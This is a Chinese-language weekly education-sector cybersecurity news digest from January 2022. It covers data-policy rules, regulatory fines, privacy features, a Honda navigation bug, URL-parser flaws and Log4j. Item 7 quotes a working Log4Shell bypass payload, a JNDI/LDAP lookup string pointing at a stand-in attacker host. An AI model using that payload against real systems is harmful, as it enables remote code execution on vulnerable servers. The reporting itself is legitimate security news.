教育网络安全动态 2022年1月第2期(2022.1.7-1.13) 一、政策要闻 1.国办发文:探索建立数据要素流通规则 《国务院办公厅关于印发要素市场化配置综合改革试点总体方案的通知》(国办发〔2021〕51号)第六章探索建立数据要素流通规则中明确提出要完善公共数据开放共享机制,建立健全数据流通交易规则,拓展规范化数据开发利用场景,加强数据安全保护等,旨在从市场的角度推动数据要素市场化进程。 (来源:国务院办公厅) 2.银保监会:银行保险机构不得将网络安全主体责任外包 中国银保监会印发《中国银保监会办公厅关于印发银行保险机构信息科技外包风险监管办法的通知》(银保监办发〔2021〕141号)中明确:银行保险机构不得将信息科技管理责任、网络安全主体责任外包;定期对外包活动进行网络和信息安全评估。 (来源:中国银保监会) 3.央行新年首张千万罚单,东亚银行因违反信用信息采集被罚 近日,央行开出2022年首张千万级别罚单。2022年1月10日,中国人民银行上海分行网站发布的行政处罚信息显示,因违反信用信息采集、提供、查询及相关管理规定,东亚银行(中国)有限公司被责令限期改正并处罚款人民币1674万元。对此,东亚银行(中国)方面回复媒体称,对于相关检查中所指出问题,东亚银行已据监管要求悉数进行整改。东亚银行(中国)将不时审视营运,通过不断强化征信管理,进一步防范风险,保持稳健经营。 (来源:南方都市报) 4.微信安卓版新增个人信息收集清单、第三方信息共享清单 此前腾讯微信团队发布了微信安卓8.0.18内测版,在微信8.0.18更新中,隐私权限进一步明确,除了之前的个人信息与权限查询之外,还新增了个人信息收集清单、第三方信息共享清单的选项。其中在个人信息收集清单中,可以查阅微信对个人信息的收集情况,包括用户基本信息、设备属性信息、用户使用过程信息、联系人信息等。 (来源:IT之家) 二、技术资讯 5. 安卓版Firefox Focus浏览器增强了隐私保护,阻止跨站点跟踪 据BleepingComputer网站报道,安卓版火狐Focus浏览器进一步强化了隐私保护功能,可防止cookie 被用于广告和分析用户行为,以此来保护用户在浏览内容时免受跨站点跟踪。据悉,该功能是通过一个名叫“全面Cookie保护”(Total Cookie Protection)的技术实现,将每个网站的cookie存储在单独的“罐子”中,以阻止网络对用户进行跟踪,并获取浏览数据。火狐浏览器母公司Mozilla表示,全面Cookie保护技术是迄今为止最强大的隐私保护措施之一,也是反对网络跟踪的长期斗争中的关键武器。 (来源:汇能云安全) 6.本田、讴歌汽车爆Y2K22漏洞 本周,本田、讴歌汽车导航系统被爆出Year 2022/千年虫漏洞。据悉,漏洞会重置导航系统时间到2002年1月1日,时间则因汽车所在位置、时区、型号的不同,被重置到12点、2点和4点,暂时没有办法修改。最新消息显示,该漏洞影响所有的本田、讴歌汽车,具体包括Honda Pilot、Odyssey、CRV、Ridgeline、Odyssey 和 Acura MDX、RDX、CSX、TL型号。目前,Honda客户服务给出的回应是将在2022年8月修复该漏洞。 (来源:汇能云安全) 7.十几款应用广泛的第三方URL解析库被曝8个漏洞 这些第三方库通过C、JavaScript、PHP、Python 和 Ruby 语言编写而成,被广泛用于多款 web 应用程序中。研究人员发布报告指出,“URL 解析中的混淆问题可导致软件(如web应用程序)异常行为,使攻击者触发拒绝服务条件、信息泄露或执行远程代码执行攻击。”URL是用户请求和检索本地资源或 web 资源的根本机制,解析库解释URL 请求的不同方式可为用户带来重大风险。比如 Log4j 日志框架中的 Log4Shell 缺陷产生的原因是,其它动态生成的字符串可在日志记录时取代某些特殊字符串,导致JNDI 查询连接到攻击者运行的服务器并执行任意 Java 代码。尽管Apache 软件基金会 (ASF) 快速推出修复方案解决该弱点,但不久发现特殊构造的 "${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}" 格式的输入可绕过缓解措施,继而再次允许远程 JNDNI 查询实现代码执行。 (来源:安全牛) 三、国际视野 8.FTC将追查无视Log4j的公司 联邦贸易委员会(FTC)周二警告称,将集结其法律力量追究未能保护消费者数据免受Log4j漏洞风险的公司和供应商。警告中写道:“FTC打算利用其全部法律权力追究未能采取合理措施保护消费者数据免遭Log4j或类似已知漏洞的公司。”联邦贸易委员会表示,那些将消费者数据泄露、未及时修补漏洞从而为漏洞利用打开大门,由此可能导致的“个人信息丢失或泄露、经济损失和其他不可逆转的伤害”的公司,正面临着巨额罚款等严重的法律后果。它特别提到了联邦贸易委员会法案 (The FTC Act)和Gramm-Leach-Bliley法案。FTC法案是该委员会的主要法规,其中针对损害消费者的行为规定了金钱补偿和其他救济。Gramm-Leach-Bliley要求金融机构保护敏感数据。“至关重要的是,依赖Log4j的公司及其供应商现在就采取行动,以减少对消费者造成伤害的可能性,以免受FTC的起诉风险” ,美国联邦贸易委员会敦促道。 (来源:嘶吼专业版) 9.因违反欧盟隐私规定,谷歌和Facebook在法面临巨额罚款 法国数据监管机构CNIL将对谷歌和Facebook分别处以1.5亿欧元(约合1.7亿美元)和6000万欧元(约合6800万美元)的罚款,原因是其违反了欧盟的隐私规定。根据CNIL的一份文件,该机构将对谷歌在美国和爱尔兰的业务分别处以9000万欧元和6000万欧元的罚款,对Facebook的爱尔兰部门处以6000万欧元的罚款,原因是其不允许法国用户轻松拒绝cookie跟踪技术。此外,如果谷歌和Facebook不在CNIL发布这项决定的三个月内纠正自己的行为,那么这两家公司还将面临每日10万欧元的罚款。该决定适用于谷歌旗下的法国网站google.fr和youtube.fr以及Facebook旗下的法国平台。 (来源:cnBeta) 10.研究人员发现70个Web缓存中毒漏洞,涉及GitHub/GitLab等 安全研究员Iustin Ladunca近期针对许多网站(包括一些高流量的在线服务)进行了调研,结果发现了70个具有不同影响的缓存中毒漏洞。Ladunca 自2020年11月开始研究Web缓存中毒,仅仅几周后,他就发现了两个新的缓存中毒漏洞:“这让我意识到缓存中毒的攻击面有多大。”他在一篇博客中详细介绍了自己是如何发现和报告网络缓存漏洞的,其中包括有 Apache Traffic Server、GitHub、GitLab、HackerOne和Cloudflare以及其他服务器。Ladunca因其发现的70个网络缓存漏洞,而获得了总计约4万美元的漏洞赏金。 (来源:51CTO) 以上内容不代表本部门观点,如有侵权请及时联系我们。
|